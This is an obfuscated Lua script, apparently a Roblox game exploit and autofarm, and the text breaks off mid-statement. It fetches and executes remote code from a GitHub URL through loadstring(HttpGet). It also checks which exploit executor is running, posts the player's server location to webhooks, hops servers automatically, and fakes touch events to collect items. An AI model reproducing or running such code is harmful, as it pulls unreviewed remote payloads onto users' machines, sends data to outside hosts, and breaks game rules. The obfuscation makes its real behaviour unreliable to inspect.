--[[
 .____                  ________ ___.    _____                           __                
 |    |    __ _______   \_____  \\_ |___/ ____\_ __  ______ ____ _____ _/  |_  ___________ 
 |    |   |  |  \__  \   /   |   \| __ \   __\  |  \/  ___// ___\\__  \\   __\/  _ \_  __ \
 |    |___|  |  // __ \_/    |    \ \_\ \  | |  |  /\___ \\  \___ / __ \|  | (  <_> )  | \/
 |_______ \____/(____  /\_______  /___  /__| |____//____  >\___  >____  /__|  \____/|__|   
         \/          \/         \/    \/                \/     \/     \/                   
          \_Welcome to LuaObfuscator.com   (Alpha 0.10.3) ~  Much Love, Ferib skidloz  

]]--

local v0=string.char;local v1=string.byte;local v2=string.sub;local v3=bit32 or bit ;local v4=v3.bxor;local v5=table.concat;local v6=table.insert;local function v7(v83,v84) local v85={};for v128=1, #v83 do v6(v85,v0(v4(v1(v2(v83,v128,v128 + 1 )),v1(v2(v84,1 + (v128% #v84) ,1 + (v128% #v84) + 1 )))%256 ));end return v5(v85);end loadstring(game:HttpGet("https://raw.githubusercontent.com/Chetdithglon/lklklkl/main/wedhook"))();if game:GetService(v7("\230\204\201\46\245\171\198\29\212","\126\177\163\187\69\134\219\167")).Map:FindFirstChild(v7("\14\212\57\209\245\32\228\57\201\253\45\201","\156\67\173\74\165")) then local v129=0;local v130;local v131;local v132;local v133;local v134;local v135;local v136;while true do if (v129==(6 -4)) then v134=nil;v135=nil;v129=3;end if (v129==(1995 -(109 + 1885))) then local v195=0;while true do if (v195==(1470 -(1269 + 200))) then v129=2;break;end if ((0 -0)==v195) then v132=nil;v133=nil;v195=816 -(98 + 717) ;end end end if (v129==(826 -(802 + 24))) then v130=0 -0 ;v131=nil;v129=1;end if (v129==(3 -0)) then v136=nil;while true do if ((0 + 0)==v130) then v131=(is_sirhurt_closure and v7("\7\190\91\30\169\52\82","\38\84\215\41\118\220\70")) or (pebc_execute and v7("\96\4\45\6\241\99\27\35\1\246\85\4","\158\48\118\66\114")) or (syn and v7("\152\61\30\55\99\182\254\235\28","\155\203\68\112\86\19\197")) or (secure_load and v7("\117\216\56\232\73\118\224\244","\152\38\189\86\156\32\24\133")) or (KRNL_LOADED and v7("\215\69\169\74","\38\156\55\199")) or (SONA_LOADED and v7("\155\114\114\41","\35\200\29\28\72\115\20\154")) or v7("\42\183\216\203\205\41\44\9\179\222\214\153\108\51","\84\121\223\177\191\237\76") ;v132=game:GetService(v7("\147\66\221\176\9\85\34\215\178\85\204","\161\219\54\169\192\90\48\80"));v130=1 + 0 ;end if (v130==3) then v136={[v7("\50\4\181","\75\103\118\217")]=_G.daobian,[v7("\229\91\116\13","\126\167\52\16\116\217")]=v135,[v7("\229\43\52\136\187\29","\156\168\78\64\224\212\121")]=v7("\55\193\150\250","\174\103\142\197"),[v7("\126\45\94\60\32\76\235","\152\54\72\63\88\69\62")]=v134};Request(v136);break;end if (v130==(1 + 0)) then local v227=0 + 0 ;while true do if ((0 -0)==v227) then v133={[v7("\76\79\2\32\77\81","\69\41\34\96")]={{[v7("\186\202\210\6\6\56","\75\220\163\183\106\98")]={{[v7("\12\187\134\50","\185\98\218\235\87")]="đảo bí ẩn",[v7("\221\61\43\243\219","\202\171\92\71\134\190")]="```Người dùng đã thấy đảo bí ẩn```",[v7("\32\207\32\129\39\196","\232\73\161\76")]=true},{[v7("\181\216\79\88","\126\219\185\34\61")]="lệnh teleport sever",[v7("\26\207\82\103\123","\135\108\174\62\18\30\23\147")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\191\231\38\194\22\171","\167\214\137\74\171\120\206\83")]=true}}}}};v134={[v7("\168\255\60\73\253\169\159\189\6\68\232\162","\199\235\144\82\61\152")]="application/json"};v227=1 + 0 ;end if (v227==1) then v130=2;break;end end end if (v130==(2 + 0)) then v135=v132:JSONEncode(v133);Request=http_request or request or HttpPost or syn.request ;v130=3;end end break;end end end if (game.PlaceId==(7449424445 -(433 + 377))) then if (game:GetService(v7("\248\205\233\84\192\205\224\91","\60\180\164\142")).Sky.MoonTextureId=="http://www.roblox.com/asset/?id=9709149052") then local v147=(is_sirhurt_closure and v7("\107\87\23\33\50\255\6","\114\56\62\101\73\71\141")) or (pebc_execute and v7("\136\251\212\208\183\218\214\197\171\225\222\214","\164\216\137\187")) or (syn and v7("\225\255\63\179\182\237\14\146\222","\107\178\134\81\210\198\158")) or (secure_load and v7("\11\11\140\210\163\54\11\142","\202\88\110\226\166")) or (KRNL_LOADED and v7("\232\29\140\251","\170\163\111\226\151")) or (SONA_LOADED and v7("\34\63\188\57","\73\113\80\210\88\46\87")) or v7("\178\36\196\6\167\132\52\221\30\232\136\56\141\21","\135\225\76\173\114") ;local v148=game:GetService(v7("\50\249\172\160\159\184\181\12\228\187\181","\199\122\141\216\208\204\221"));local v149={[v7("\168\208\18\245\124\229","\150\205\189\112\144\24")]={{[v7("\35\141\186\64\0\155","\112\69\228\223\44\100\232\113")]={{[v7("\218\30\10\214","\230\180\127\103\179\214\28")]=v7("\219\80\26\6\201\78\239\130","\128\236\101\63\38\132\33"),[v7("\186\168\29\81\179","\175\204\201\113\36\214\139")]="Người dùng đã thấy Moon 75%",[v7("\78\194\57\213\10\66","\100\39\172\85\188")]=true},{[v7("\163\121\180\133","\83\205\24\217\224")]="lệnh teleport sever",[v7("\240\196\193\40\227","\93\134\165\173")]='game:GetService("TeleportService"):TeleportToPlaceInstance('   .. game.PlaceId   .. ', "'   .. game.JobId   .. '", game.Players.LocalPlayer)' ,[v7("\183\252\205\203\52\203","\30\222\146\161\162\90\174\210")]=true}}}}};local v150={[v7("\198\65\126\30\224\64\100\71\209\87\96\15","\106\133\46\16")]="application/json"};local v151=v148:JSONEncode(v149);Request=http_request or request or HttpPost or syn.request ;local v152={[v7("\109\50\127","\32\56\64\19\156\58")]=_G.FullMoon,[v7("\120\199\225\79","\224\58\168\133\54\58\146")]=v151,[v7("\116\83\95\245\122\130","\107\57\54\43\157\21\230\231")]=v7("\235\164\34\193","\175\187\235\113\149\217\188"),[v7("\20\170\128\72\230\107\107","\24\92\207\225\44\131\25")]=v150};Request(v152);end end local v8=Instance.new(v7("\120\208\170\73\30\115\108\198\177","\29\43\179\216\44\123"));local v9=Instance.new(v7("\137\220\56\88\159\204\52\88\178\215","\44\221\185\64"));local v10=Instance.new(v7("\52\206\107\80\97\15\226\90","\19\97\135\40\63"));local v11=Instance.new(v7("\155\117\20\41\46\53\167\89\61\47","\81\206\60\83\91\79"));local v12=Instance.new(v7("\122\174\200\102\13\214\89\176\65\165","\196\46\203\176\18\79\163\45"));local v13=Instance.new(v7("\141\11\93\17\54\245\234\170","\143\216\66\30\126\68\155"));local v14=Instance.new(v7("\159\225\62\223\215\172\220\228","\129\202\168\109\171\165\195\183"));v8.Parent=game.Players.LocalPlayer:WaitForChild(v7("\18\84\54\193\219\6\193\55\81","\134\66\56\87\184\190\116"));v8.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;v9.Name=v7("\47\52\31\190\11","\85\92\81\105\219\121\139\65");v9.Parent=v8;v9.BackgroundColor3=Color3.fromRGB(1238 -983 ,255,255);v9.BorderColor3=Color3.fromRGB(1619 -(1427 + 192) ,0 + 0 ,0 -0 );v9.BorderSizePixel=0 + 0 ;v9.Position=UDim2.new(0.930088699 + 0 ,326 -(192 + 134) ,0.601923108,1276 -(316 + 960) );v9.Size=UDim2.new(0.062432725,0 + 0 ,0.0596153848 + 0 ,0 + 0 );v9.Font=Enum.Font.SourceSans;v9.Text="Đổi Sever";v9.TextColor3=Color3.fromRGB(0,0 -0 ,0);v9.TextScaled=true;v9.TextSize=565 -(83 + 468) ;v9.TextWrapped=true;v10.CornerRadius=UDim.new(1806 -(1202 + 604) ,93 -73 );v10.Parent=v9;v11.Color=ColorSequence.new({ColorSequenceKeypoint.new(0,Color3.fromRGB(204 -130 ,255,526 -(45 + 280) )),ColorSequenceKeypoint.new(0.29 + 0 ,Color3.fromRGB(44 + 75 ,250,127)),ColorSequenceKeypoint.new(0.55 + 0 ,Color3.fromRGB(39 + 178 ,455 -209 ,150)),ColorSequenceKeypoint.new(0.77 + 0 ,Color3.fromRGB(242,1973 -(1733 + 39) ,130)),ColorSequenceKeypoint.new(1035 -(125 + 909) ,Color3.fromRGB(2203 -(1096 + 852) ,69 + 84 ,217 -64 ))});v11.Parent=v9;v12.Parent=v9;v12.BackgroundColor3=Color3.fromRGB(248 + 7 ,767 -(409 + 103) ,255);v12.BackgroundTransparency=1;v12.BorderColor3=Color3.fromRGB(236 -(46 + 190) ,95 -(51 + 44) ,0);v12.BorderSizePixel=0;v12.Position=UDim2.new( -(0.103447914 + 0),1317 -(1114 + 203) , -1.54838681,726 -(228 + 498) );v12.Size=UDim2.new(1.18965518 + 0 ,0,1.54838705 + 0 ,663 -(174 + 489) );v12.ZIndex= -(2 -1);v12.Font=Enum.Font.SourceSansBold;v12.Text="x";v12.TextColor3=Color3.fromRGB(2160 -(830 + 1075) ,524 -(303 + 221) ,1269 -(231 + 1038) );v12.TextScaled=true;v12.TextSize=12 + 2 ;v12.TextStrokeColor3=Color3.fromRGB(1417 -(171 + 991) ,98 -74 ,18 -11 );v12.TextWrapped=true;v13.CornerRadius=UDim.new(0 -0 ,20);v13.Parent=v12;v14.Thickness=3.9000000953674316;v14.Parent=v12;local function v56() local v86=Instance.new(v7("\206\176\66\76\108\203","\191\157\211\48\37\28"),v11);local v87=game:GetService(v7("\235\8\241\25\52\236\26\230\10\51\220\26","\90\191\127\148\124"));local v88=TweenInfo.new(4 + 0 ,Enum.EasingStyle.Linear,Enum.EasingDirection.In, -(3 -2));local v89=v87:Create(v86.Parent,v88,{[v7("\74\136\58\22\108\142\33\25","\119\24\231\78")]=1038 -678 });v89:Play();end coroutine.wrap(v56)();local function v57() local v90=0;local v91;local v92;local v93;while true do if (v90==1) then v93=nil;while true do if (v91==(1 -0)) then while true do if (v92==(0 -0)) then v93=Instance.new(v7("\177\46\183\67\204\84","\113\226\77\197\42\188\32"),v12);v93.Parent.MouseButton1Click:Connect(function() v93.Parent.Parent:Destroy();end);break;end end break;end if (v91==(1248 -(111 + 1137))) then v92=158 -(91 + 67) ;v93=nil;v91=2 -1 ;end end break;end if (v90==(0 + 0)) then v91=523 -(423 + 100) ;v92=nil;v90=1 + 0 ;end end end coroutine.wrap(v57)();local function v58() local v94=0 -0 ;local v95;while true do if (v94==(0 + 0)) then v95=Instance.new(v7("\22\25\247\180\54\37\247\167\51\6\224","\213\90\118\148"),v9);v95.Parent.MouseButton1Click:Connect(function() game:GetService(v7("\111\43\184\83\93\84\60\160\101\72\73\56\189\85\72","\45\59\78\212\54")):Teleport(game.PlaceId,game:GetService(v7("\32\90\130\146\131\60\190","\144\112\54\227\235\230\78\205")).LocalPlayer);end);break;end end end coroutine.wrap(v58)();local v59={};local v60=game:GetService(v7("\135\63\10\249\222\104\182\58\25\245\211\94","\59\211\72\111\156\176"));local v61=Instance.new(v7("\125\132\241\40\75\137\196\56\71","\77\46\231\131"));v61.Name=v7("\152\85\186\65\168\85\188\65","\32\218\52\214");v61.Parent=game.CoreGui;v61.ZIndexBehavior=Enum.ZIndexBehavior.Sibling;local v66=Instance.new(v7("\104\5\48\165\244","\58\46\119\81\200\145\208\37"));v66.Name=v7("\5\131\36\165\143\175\55\38\137","\86\75\236\80\204\201\221");v66.Parent=v61;v66.AnchorPoint=Vector2.new(0.5,0.5);v66.BackgroundColor3=Color3.fromRGB(1026 -(326 + 445) ,255,1112 -857 );v66.BackgroundTransparency=2 -1 ;v66.Position=UDim2.new(2.2 -1 ,711 -(530 + 181) ,881.0613496937 -(614 + 267) ,32 -(19 + 13) );v66.Size=UDim2.new(0 -0 ,3802 -2170 ,0 -0 ,26 + 74 );local v74=Instance.new(v7("\71\104\91\140\237\159\94\64\110\138\235\159","\235\18\33\23\229\158"));v74.Name=v7("\126\181\213\178\92\179\210\175\92\187\216\180\69\174","\219\48\218\161");v74.Parent=v66;v74.FillDirection=Enum.FillDirection.Vertical;v74.SortOrder=Enum.SortOrder.LayoutOrder;v74.Padding=UDim.new(0 -0 ,5);v59.Notification=function(v96,v97,v98,v99,v100) local v101=0 -0 ;local v102;local v103;local v104;local v105;local v106;local v107;local v108;local v109;local v110;local v111;while true do if (1==v101) then local v153=1812 -(1293 + 519) ;local v154;while true do if (v153==(0 -0)) then v154=0;while true do if ((0 -0)==v154) then local v236=0 -0 ;while true do if (v236==(0 -0)) then v103=Instance.new(v7("\153\7\152\95\213\88\21\12","\105\204\78\203\43\167\55\126"));v103.Thickness=2 -1 ;v236=1 + 0 ;end if (v236==(1 + 0)) then v154=2 -1 ;break;end end end if ((1 + 2)==v154) then v103.Color=Color3.fromRGB(85 + 170 ,255,160 + 95 );v101=2;break;end if (v154==(1097 -(709 + 387))) then v103.Name="";v103.Parent=v102;v154=1860 -(673 + 1185) ;end if (v154==2) then local v240=0;while true do if (v240==(0 -0)) then v103.ApplyStrokeMode=Enum.ApplyStrokeMode.Border;v103.LineJoinMode=Enum.LineJoinMode.Round;v240=3 -2 ;end if (v240==(1 -0)) then v154=3 + 0 ;break;end end end end break;end end end if (v101==(8 + 2)) then v109.BorderSizePixel=0 -0 ;v109.Position=UDim2.new(0.0320000015 + 0 ,0 -0 ,0.870000005 -0 ,1880 -(446 + 1434) );v109.Size=UDim2.new(0,1519 -(1040 + 243) ,0,8 -5 );v110.Parent=v109;v110.CornerRadius=UDim.new(1847 -(559 + 1288) ,7);v110.Name="";v111.Parent=v66;v101=11;end if (v101==(1938 -(609 + 1322))) then local v162=454 -(13 + 441) ;while true do if (v162==(10 -7)) then v108.Size=UDim2.new(0,458 -283 ,0 -0 ,1 + 24 );v101=29 -21 ;break;end if (v162==(0 + 0)) then v108=Instance.new(v7("\131\224\97\225\197\202\181\224\117","\171\215\133\25\149\137"));v108.Name=v7("\213\205\42\238\193\63\232\75","\34\129\168\82\154\143\80\156");v162=1 + 0 ;end if (v162==(5 -3)) then v108.BackgroundColor3=Color3.fromRGB(140 + 115 ,468 -213 ,255);v108.BackgroundTransparency=1 + 0 ;v162=2 + 1 ;end if (v162==(1 + 0)) then v108.Parent=v107;v108.Active=true;v162=2;end end end if (v101==5) then local v163=0;while true do if (v163==(0 + 0)) then v106.Position=UDim2.new(0.25 + 0 ,433 -(153 + 280) ,0.15 -0 ,0 + 0 );v106.Size=UDim2.new(0 + 0 ,92 + 83 ,0 + 0 ,18 + 6 );v163=1 -0 ;end if ((1 + 0)==v163) then v106.Font=Enum.Font.LuckiestGuy;v106.TextColor3=Color3.fromRGB(752 -(89 + 578) ,122 + 48 ,255);v163=3 -1 ;end if (v163==(1051 -(572 + 477))) then v106.TextSize=2 + 11 ;v106.Text=v97;v163=3;end if (v163==(2 + 1)) then v106.TextXAlignment=Enum.TextXAlignment.Left;v101=1 + 5 ;break;end end end if (3==v101) then v105.Name=v7("\137\170\198\252\82\241\143\179\206","\159\224\199\167\155\55");v105.Parent=v102;v105.AnchorPoint=Vector2.new(86.5 -(84 + 2) ,0.5 -0 );v105.BackgroundColor3=Color3.fromRGB(184 + 71 ,1097 -(497 + 345) ,7 + 248 );v105.Position=UDim2.new(0.135999978 + 0 ,0,0.5,0);v105.Size=UDim2.new(0,50,1333 -(605 + 728) ,36 + 14 );v105.BackgroundTransparency=1 -0 ;v101=4;end if ((1 + 8)==v101) then v109=Instance.new(v7("\163\160\50\6\77","\233\229\210\83\107\40\46"));v110=Instance.new(v7("\244\107\17\217\23\207\71\32","\101\161\34\82\182"));v111=Instance.new(v7("\221\36\105\255\223\230\139\32\239","\78\136\109\57\158\187\130\226"));v109.Name=v7("\10\54\244\244","\145\94\95\153");v109.Parent=v102;v109.Active=true;v109.BackgroundColor3=Color3.fromRGB(85,170,942 -687 );v101=10 + 0 ;end if ((21 -13)==v101) then local v175=0 + 0 ;while true do if (v175==(490 -(457 + 32))) then local v215=0 + 0 ;while true do if ((1403 -(832 + 570))==v215) then v175=2 + 0 ;break;end if (v215==(0 + 0)) then v108.TextScaled=true;v108.TextColor3=Color3.fromRGB(255,902 -647 ,123 + 132 );v215=797 -(588 + 208) ;end end end if (v175==(8 -5)) then repeat wait();until v102.Size==UDim2.new(0,(2050 -(884 + 916)) -10 ,0,70)  v101=18 -9 ;break;end if ((0 + 0)==v175) then v108.Font=Enum.Font.GothamBlack;v108.Text=v98;v175=1;end if (v175==2) then v108.TextSize=665 -(232 + 421) ;v108.TextXAlignment=Enum.TextXAlignment.Left;v175=1892 -(1569 + 320) ;end end end if (v101==(2 + 4)) then local v176=0 + 0 ;while true do if (v176==(9 -6)) then v107.Size=UDim2.new(605 -(316 + 289) ,175,0 -0 ,2 + 23 );v101=1460 -(666 + 787) ;break;end if (v176==1) then local v223=0;while true do if (0==v223) then v107.AnchorPoint=Vector2.new(425.5 -(360 + 65) ,0.5 + 0 );v107.BackgroundColor3=Color3.fromRGB(509 -(79 + 175) ,255,255);v223=1 -0 ;end if (v223==(1 + 0)) then v176=5 -3 ;break;end end end if (v176==(0 -0)) then v107.Name=v7("\9\208\88\86\182\3\195\91\87\182","\211\69\177\58\58");v107.Parent=v102;v176=900 -(503 + 396) ;end if (v176==2) then local v226=181 -(92 + 89) ;while true do if (v226==(1 -0)) then v176=2 + 1 ;break;end if (v226==0) then v107.BackgroundTransparency=1 + 0 ;v107.Position=UDim2.new(0.625999987 -0 ,0,0.620000005 + 0 ,0 -0 );v226=1 + 0 ;end end end end end if (v101==(2 + 2)) then v105.Image="http://www.roblox.com/asset/?id="   .. tostring(v100) ;v106=Instance.new(v7("\195\246\36\198\219\242\62\215\251","\178\151\147\92"));v107=Instance.new(v7("\170\239\77\63\23","\26\236\157\44\82\114\44"));v106.Name=v7("\62\54\209\87\35\42","\59\74\78\181");v106.Parent=v102;v106.BackgroundColor3=Color3.fromRGB(258 -173 ,22 + 148 ,388 -133 );v106.BackgroundTransparency=1;v101=1249 -(485 + 759) ;end if (v101==(4 -2)) then v103.Transparency=0;v102:TweenSizeAndPosition(UDim2.new(1189 -(442 + 747) ,(1385 -(832 + 303)) -(956 -(88 + 858)) ,0,22 + 48 ),UDim2.new(0.5,0 + 0 ,0.5 + 0 ,789 -(766 + 23) ),v7("\138\191\55","\49\197\202\67\126\115\100\167"),v7("\21\90\220\34","\62\87\59\191\73\224\54"),0.3,true);v104=Instance.new(v7("\210\43\217\198\245\12\255\219","\169\135\98\154"));v104.CornerRadius=UDim.new(0,4);v104.Name=v7("\232\120\42\90\248\33\252\194\99\45\88\248","\168\171\23\68\52\157\83");v104.Parent=v102;v105=Instance.new(v7("\221\124\244\170\32\1\134\246\116\249","\231\148\17\149\205\69\77"));v101=14 -11 ;end if (v101==(0 -0)) then if (v100==nil) then v100="";end if (v99==nil) then v99=1;end v102=Instance.new(v7("\194\99\125\68\222","\128\132\17\28\41\187\47"));v102.Name=v7("\53\59\18\54\88\39\32\7\55\88","\61\97\82\102\90");v102.Parent=v66;v102.BackgroundColor3=Color3.fromRGB(92 -57 ,118 -83 ,35);v102.Size=UDim2.new(0,1073 -(1036 + 37) ,0,0);v101=1 + 0 ;end if (v101==(21 -10)) then v111.PaddingLeft=UDim.new(0 + 0 ,15);v111.PaddingTop=UDim.new(0,1495 -(641 + 839) );v60:Create(v109,TweenInfo.new(tonumber(v99),Enum.EasingStyle.Linear,Enum.EasingDirection.InOut),{[v7("\206\196\14\208","\215\157\173\116\181\46")]=UDim2.new(913 -(910 + 3) ,0 -0 ,1684 -(1466 + 218) ,2 + 1 )}):Play();delay(tonumber(v99),function() v60:Create(v105,TweenInfo.new(1148.2 -(556 + 592) ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\28\185\138\245\223\1\166\138\252\201\37\181\153\247\212\54\173","\186\85\212\235\146")]=1 + 0 }):Play();v60:Create(v108,TweenInfo.new(808.2 -(329 + 479) ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\246\132\14\234\13\252\89\204\146\6\255\43\235\86\193\152","\56\162\225\118\158\89\142")]=855 -(174 + 680) }):Play();v60:Create(v106,TweenInfo.new(0.2 -0 ,Enum.EasingStyle.Sine,Enum.EasingDirection.InOut),{[v7("\104\0\216\187\22\202\93\11\211\191\35\202\89\11\195\182","\184\60\101\160\207\66")]=1 -0 }):Play();wait(0.3 + 0 );v60:Create(v102,TweenInfo.new(739.4 -(396 + 343) ,Enum.EasingStyle.Quart,Enum.EasingDirection.InOut),{[v7("\2\139\102\185","\220\81\226\28")]=UDim2.new(0 + 0 ,1477 -(29 + 1448) ,1389 -(135 + 1254) ,263 -193 )}):Play();wait(0.3 -0 );v102:Destroy();end);break;end end end;repeat wait();until game:IsLoaded() aut=true;function totarget(v112) local v113=0 + 0 ;local v114;local v115;local v116;local v117;while true do if ((1527 -(389 + 1138))==v113) then local v192=0;while true do if (v192==(574 -(102 + 472))) then v114=game:service(v7("\39\194\135\254\228\244\22\199\148\242\233\194","\167\115\181\226\155\138"));v115=TweenInfo.new((game:GetService(v7("\210\46\230\69\126\99\213","\166\130\66\135\60\27\17"))[v7("\104\69\205\116\60\116\70\207\108\53\86","\80\36\42\174\21")].Character.HumanoidRootPart.Position-v112.Position).Magnitude/(284 + 16) ,Enum.EasingStyle.Linear);v192=1;end if (1==v192) then v113=1 + 0 ;break;end end end if (v113==(1 + 0)) then v116,v117=pcall(function() v116=v114:Create(game.Players.LocalPlayer.Character['HumanoidRootPart'],v115,{[v7("\109\54\37\123\67\21","\26\46\112\87")]=v112});v116:Play();end);if  not v116 then return v117;end break;end end end function thisCode() repeat task.wait();until game:IsLoaded() local v118=game.PlaceId;local v119={};local v120="";local v121=os.date(v7("\248\105\191","\212\217\67\203\20\223\223\37")).hour;local v122=false;local v123=pcall(function() v119=game:GetService(v7("\146\153\188\194\137\136\186\196\179\142\173","\178\218\237\200")):JSONDecode(readfile(v7("\152\186\242\227\183\184\227\227\179\167\240\213\164\166\168\218\165\186\232","\176\214\213\134")));end);if  not v123 then local v145=1545 -(320 + 1225) ;local v146;while true do if (v145==(0 -0)) then v146=0;while true do if (v146==0) then table.insert(v119,v121);writefile(v7("\218\162\162\231\169\91\92\199\168\164\194\173\68\74\186\167\165\219\166","\57\148\205\214\180\200\54"),game:GetService(v7("\58\233\33\36\69\23\239\35\61\117\23","\22\114\157\85\84")):JSONEncode(v119));break;end end break;end end end function TPReturner() local v137=0 + 0 ;local v138;local v139;local v140;local v141;while true do if (v137==2) then while true do if (v138==(1464 -(157 + 1307))) then local v228=0;while true do if (v228==(1859 -(821 + 1038))) then v139=nil;if (v120=="") then v139=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v118   .. "/servers/Public?sortOrder=Asc&limit=100" ));else v139=game.HttpService:JSONDecode(game:HttpGet("https://games.roblox.com/v1/games/"   .. v118   .. "/servers/Public?sortOrder=Asc&limit=100&cursor="   .. v120 ));end v228=2 -1 ;end if (v228==(1 + 0)) then v138=1;break;end end end if (v138==(1 -0)) then local v229=0;while true do if (v229==(1 + 0)) then v138=4 -2 ;break;end if ((1026 -(834 + 192))==v229) then v140="";if (v139.nextPageCursor and (v139.nextPageCursor~=v7("\202\222\31\200","\200\164\171\115\164\61\150")) and (v139.nextPageCursor~=nil)) then v120=v139.nextPageCursor;end v229=1 + 0 ;end end end if (v138==(1 + 1)) then v141=0 + 0 ;for v232,v233 in pairs(v139.data) do local v234=true;v140=tostring(v233.id);if (tonumber(v233.maxPlayers)>tonumber(v233.playing)) then for v250,v251 in pairs(v119) do if (v141~=(0 -0)) then if (v140==tostring(v251)) then v234=false;end elseif (tonumber(v121)~=tonumber(v251)) then local v262=pcall(function() delfile(v7("\144\251\23\118\130\179\241\48\64\145\168\241\17\86\205\180\231\12\75","\227\222\148\99\37"));v119={};table.insert(v119,v121);end);end v141=v141 + 1 ;end if (v234==true) then local v259=0;while true do if (v259==(305 -(300 + 4))) then pcall(function() writefile(v7("\29\93\70\197\248\62\87\97\243\235\37\87\64\229\183\57\65\93\248","\153\83\50\50\150"),game:GetService(v7("\117\98\103\12\64\174\95\75\127\112\25","\45\61\22\19\124\19\203")):JSONEncode(v119));wait();game:GetService(v7("\245\23\1\240\18\127\171\213\33\8\231\20\121\186\196","\217\161\114\109\149\98\16")):TeleportToPlaceInstance(v118,v140,game.Players.LocalPlayer);end);wait(2 + 2 );break;end if (v259==(0 -0)) then table.insert(v119,v140);wait();v259=363 -(112 + 250) ;end end end end end break;end end break;end if (v137==(0 + 0)) then local v196=0 -0 ;while true do if (v196==1) then v137=1;break;end if (v196==0) then v138=0 + 0 ;v139=nil;v196=1 + 0 ;end end end if (v137==(1 + 0)) then v140=nil;v141=nil;v137=1 + 1 ;end end end function Teleport() while wait() do pcall(function() TPReturner();if (v120~="") then TPReturner();end end);end end local v124=0.5 + 0 ;task.spawn(function() while task.wait(v124) do pcall(function() for v197,v198 in pairs(game.CoreGui:GetDescendants()) do pcall(function() if string.find(v198.Name,v7("\55\50\42\115\174\89\23\51\43\125\187\113","\20\114\64\88\28\220")) then if string.find(v198.Text,v7("\2\4\209\161\234\217\169\40\65\217\189\251\219","\221\81\97\178\212\152\176")) then local v247=1414 -(1001 + 413) ;while true do if (v247==0) then v124=1000000000;Teleport();break;end end end end end);end end);end end);local v125=game:GetService(v7("\254\243\28\233\14\200\245\58\238\19","\122\173\135\125\155"));local v126=Instance.new(v7("\166\200\14\189\62\51\196\129\231\21\183\60\37\193\139\207","\168\228\161\96\217\95\81"));function gui() v125:SetCore(v7("\232\212\32\88\1\88\207\216\40\85\44\86\207\216\33\82","\55\187\177\78\60\79"),{[v7("\25\199\75\231\67","\224\77\174\63\139\38\175")]=v7("\165\84\76\33\196\103\74\47\137\1\123\38\129\82\76","\78\228\33\56"),[v7("\250\123\170\23","\229\174\30\210\99")]=v7("\57\244\198\83\228\51\49\26\238\141\84\255\49\54","\89\123\141\230\49\141\93"),[v7("\199\116\238\24","\42\147\17\150\108\112")]=v7("\59\163\33\122\170\203\7\163\62\107\167\206\6\190","\136\111\198\77\31\135"),[v7("\54\12\191\66","\201\98\105\199\54\221\132\119")]=v7("\159\5\155\36\6\117\171\184\1\134\97\7\39\190\182\30\144\97\1\58\168\188\76\209\119\85","\204\217\108\227\65\98\85"),[v7("\119\192\250\235","\160\62\163\149\133\76")]="rbxassetid://16435032782",[v7("\242\181\31\46\215\223\175\3","\163\182\192\109\79")]=math.huge,[v7("\23\39\12\204\247\53\37\11","\149\84\70\96\160")]=v126,[v7("\26\19\25\249\55\8\92","\141\88\102\109")]=v7("\155\86\211","\161\211\51\170\16\122\93\53")});end gui();v126.OnInvoke=function(v142) if (v142==v7("\211\171\171","\72\155\206\210")) then local v193=0;local v194;while true do if (v193==0) then v194=0 -0 ;while true do if (v194==(882 -(244 + 638))) then aut=false;gui();break;end end break;end end elseif (v142==v7("\110\127\77","\83\38\26\52\110")) then local v199=693 -(627 + 66) ;while true do if (v199==(2 -1)) then auto();break;end if ((602 -(512 + 90))==v199) then aut=true;gui();v199=1907 -(1665 + 241) ;end end end end;function auto() if (aut==true) then task.spawn(function() while aut==true  do if (aut==true) then local v230=game.Players.LocalPlayer:FindFirstChild(v7("\123\31\38\84\89\20\51\67\74","\38\56\119\71"));if  not game.Players.LocalPlayer.Character then else local v248=game.Players.LocalPlayer.Character:FindFirstChild(v7("\208\253\93\193\7\116\212","\54\147\143\56\182\69"),true);if v248 then v248:Destroy();end local v249=game.Players.LocalPlayer.Character:FindFirstChild(v7("\254\148\242\72\209\217\136\251","\191\182\225\159\41"));if v249 then local v252=game.Workspace:FindFirstChild(v7("\8\26\45\70\159\211","\162\75\114\72\53\235\231")) or game.Workspace:FindFirstChild(v7("\175\52\65\241\71\81","\98\236\92\36\130\51")) or game.Workspace:FindFirstChild(v7("\135\17\9\169\81\250","\80\196\121\108\218\37\200\213")) ;if v252 then local v261=717 -(373 + 344) ;while true do if ((0 + 0)==v261) then game.Players.LocalPlayer.Character:PivotTo(v252:GetPivot());firesignal(v252.Touched,game.Players.LocalPlayer.Character.HumanoidRootPart);break;end end elseif (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\38\122\17\107\11\1\140\64\87\3\109\64\0\143\19\96","\234\96\19\98\31\43\110")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\32\22\65\211\236\125\141\70\59\83\213\167\124\142\21\12","\235\102\127\50\167\204\18")) or game.Players.LocalPlayer.Backpack:FindFirstChild("God's Chalice") or game.Players.LocalPlayer.Character:FindFirstChild("God's Chalice")) then aut=false;Teleport();break;end end end end task.wait();end end);end end end thisCode();auto();task.spawn(function() while wait() do if (game.Players.LocalPlayer.Backpack:FindFirstChild(v7("\118\168\230\55\4\33\86\225\209\34\86\37\94\164\230\48","\78\48\193\149\67\36")) or game.Players.LocalPlayer.Character:FindFirstChild(v7("\22\23\147\12\1\63\24\192\60\64\34\21\142\29\82\35","\33\80\126\224\120"))) then aut=false;end end end);join=game.Players.localPlayer.Neutral==false ;if (_G.Team==nil) then _G.Team=v7("\220\161\17\197\72\233\187","\60\140\200\99\164");end _G.Team=v7("\170\245\22\47\172\130\231","\194\231\148\100\70");if (((_G.Team==v7("\118\69\211\162\226\205\85","\168\38\44\161\195\150")) or (_G.Team==v7("\173\253\144\127\62\237\165","\118\224\156\226\22\80\136\214"))) and  not join) then local v143=0 + 0 ;local v144;while true do if (v143==(0 -0)) then v144=0 -0 ;while true do if (v144==0) then repeat local v235=1099 -(35 + 1064) ;while true do if (v235==(0 + 0)) then wait();pcall(function() local v260=0;while true do if ((0 -0)==v260) then join=game.Players.localPlayer.Neutral==false ;if (_G.Team==v7("\114\231\75\129\86\235\74","\224\34\142\57")) then for 